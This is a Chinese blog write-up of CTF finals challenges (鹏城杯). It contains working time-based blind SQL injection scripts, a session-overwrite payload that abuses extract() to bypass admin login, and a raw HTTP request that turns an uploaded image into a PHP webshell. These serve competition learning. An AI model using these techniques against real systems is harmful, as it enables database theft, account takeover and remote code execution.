鹏城杯决赛部分题目

鹏城杯决赛 wp

基本没接触到内网,就最后试了试,但msf获取到shell后代理转发还是没成功。内网渗透真就一张白纸,希望今年能多学学。
[toc]

典型企业网络

两个flag可以直接访问看到
http://60.208.18.2/robots.txt

http://60.208.18.2:81/flag.txt

摄像头干扰

tcp.stream eq 30
MzIwZjA1Y2RmMDI0OGZmMGQwODZhOGYxYTAyNDk5NTg=

经典高校网络

/.git存在git泄露,/Admin.php可以登陆后台,存在测试用户testtest密码为schoolcms,登陆后可以获得一个flag

时间注入得到数据库的flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
import requests
import time
url0='http://60.209.18.2/index.php'

def test(bool):
    url=url0+f"?m=Admin&c=Article&a=SaveInfo&id[where]=id=3 and if({bool},sleep(2),0)--+1"
    tb=time.time()
    requests.get(url,cookies={'PHPSESSID':'ufj7v0cf19tb37bvu0iapjcp60'})
    ta=time.time()
    # print(ta-tb)
    return True if ta-tb>=2 else False
def inject():
    url0='http://127.0.0.1:63342/php/mysql_injection/time_blind.php'
    # select='database()'
    # schoolcms
    select="select group_concat(table_name) from information_schema.tables where table_schema='schoolcms'"
    # flag
    select="select group_concat(column_name) from information_schema.columns where table_name='flag'"
    # flag
    select="select flag from flag"
    # PCL{d3be4ccd-bf19-41fe-bfe4-8d8db7fd0a1e}
    result=''
    for pos in range(1,100):
        guess=32
        while True:
            bool=f'ascii(substr(({select}),{pos},1))={guess}'
            if test(bool):
                break
            guess+=1
            if guess==127:
                return
        result+=chr(guess)
        print(result)
if __name__ == '__main__':
    inject()
    # test(1)

上传网站logo处可以上传php木马,路径根据源码可以知道,文件名是以时间命名的,爆破即可,网站根目录有一个flag

云原生场景

在action.php存在sql注入,脚本如下,查询select flag from flag即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63

import requests
url = "http://10.10.1.11:8080/action.php?mode=login"

result = []
import requests
import time

def test(bool):
    # url=url0+f"?m=Admin&c=Article&a=SaveInfo&id[where]=id=3 and if({bool},sleep(1),0)--+1"
    payload = f"&pass=p&user=0'XOR(if({bool},sleep(0.5),0))XOR'Z"
    tb=time.time()
    res = requests.post(url,headers={"Cookie":"PHPSESSID=9kgvt180gn1t3ji3i8pd7kt4ev",
                                     "User-Agent":"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36",
                                     "Content-Type":"Application/x-www-form-urlencoded"},data=payload)
    # print(res.request.headers)
    # print(res.text)
    ta=time.time()
    # print(ta-tb)
    return ta-tb

def inject():
    name = ''
    for i in range(1, 100000):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            # select = 'select group_concat(column_name) from information_schema.columns where table_name=\'xinxizichan\''
            # select = 'select group_concat(table_name) from information_schema.tables where table_schema=database()'
            # select = 'select group_concat(password) from zcglxt_ccn.user'
            # select = 'select group_concat("id:",id,"user:",user,"action:",action,"ip:",ip)'
            select = 'select ll from xinxizichan where id =2'
            # information_schema,mysql,performance_schema,sys,zcglxt_ccn
            # select =' select group_concat(username) from zcglxt_ccn.config'
            # admin,test
            # id,user,action,ip,time

            # general_log_file: /var/lib/mysql/11279c090274.log   general_log:未指定

            # bgszichan,config,danwei,flag,juese,log,system_menu,user,wgbzichan,xinxizichan,zclx,zhuangtai
            # config : id,title,value,sm
            # juese:
            # bgsizichaun:id,zcbh,xlh,zclx,zczt,bm,bgr,dz,cgsj,rzsj,zbsc,sysc,pp,xh,zcly,zcjz,gg,bz,img,ll,
            # danwei:id name status
            # zhuangtai:id,name,status
            # system_menu:id,pid,title,icon,href,target,sort,status,remark,create_at,update_at,delete_at
            bool = f'ascii(substr(({select}),{i},1))>{mid}'
            cha = test(bool)
            if cha > 0.5:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2

        if mid == 32:
            break
        name = name + chr(mid)
        print(name)
if __name__ == '__main__':
    inject()
    # test(1)
    # C:\

在changepassword处存在extract变量覆盖,post传参覆盖session,从而登陆上admin账户

1
&_SESSION[admin]=admin&_SESSION[juese]=1&_SESSION[user]=admin

在资产目录下可以上传图片马,然后rename函数可以将文件名改为php后缀。但进入if之前需要传入data数据让数据库成功执行update修改数据一次。
在这里插入图片描述
通过查询获取data数据格式
在这里插入图片描述
修改img参数的值,发送如下请求,即可将图片马改为php文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /action.php?mode=xiugaixxzxzc HTTP/1.1
Host: 10.10.1.11:8080
Content-Length: 607
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://10.10.1.11:8080
Referer: http://10.10.1.11:8080/page/editxxzichan.php?id=9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ko;q=0.8
Cookie: PHPSESSID=de4b6l8qh31fodhe6jig3qb0sm
Connection: close

id=9&zz=1&data=%7b%22zclx%22%3a%221%22%2c%22zczt%22%3a%221%22%2c%22zcbh%22%3a%22%22%2c%22xlh%22%3a%22ddddssss%22%2c%22bgr%22%3a%22aaa%22%2c%22bm%22%3a%221%22%2c%22dz%22%3a%22dddd%22%2c%22cgsj%22%3a%222022-07-17%22%2c%22rzsj%22%3a%222022-07-17%22%2c%22zbsc%22%3a%220%22%2c%22sysc%22%3a%220%22%2c%22pp%22%3a%22123123%22%2c%22xh%22%3a%22%22%2c%22gg%22%3a%22%22%2c%22zcly%22%3a%22自购%22%2c%22zcjz%22%3a%220.00%22%2c%22bz%22%3a%22%22%2c%22file%22%3a%22%22%2c%22img%22%3a%22%2fuploads%2f1.php%22%2c%22wlbs%22%3a%220%22%2c%22ip%22%3a%22%22%2c%22xsq%22%3a%22%22%2c%22yp%22%3a%220%22%2c%22nc%22%3a%220%22%7d

getshell后在/start.sh文件下发现两个flag
在这里插入图片描述

ctf
ctf web

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!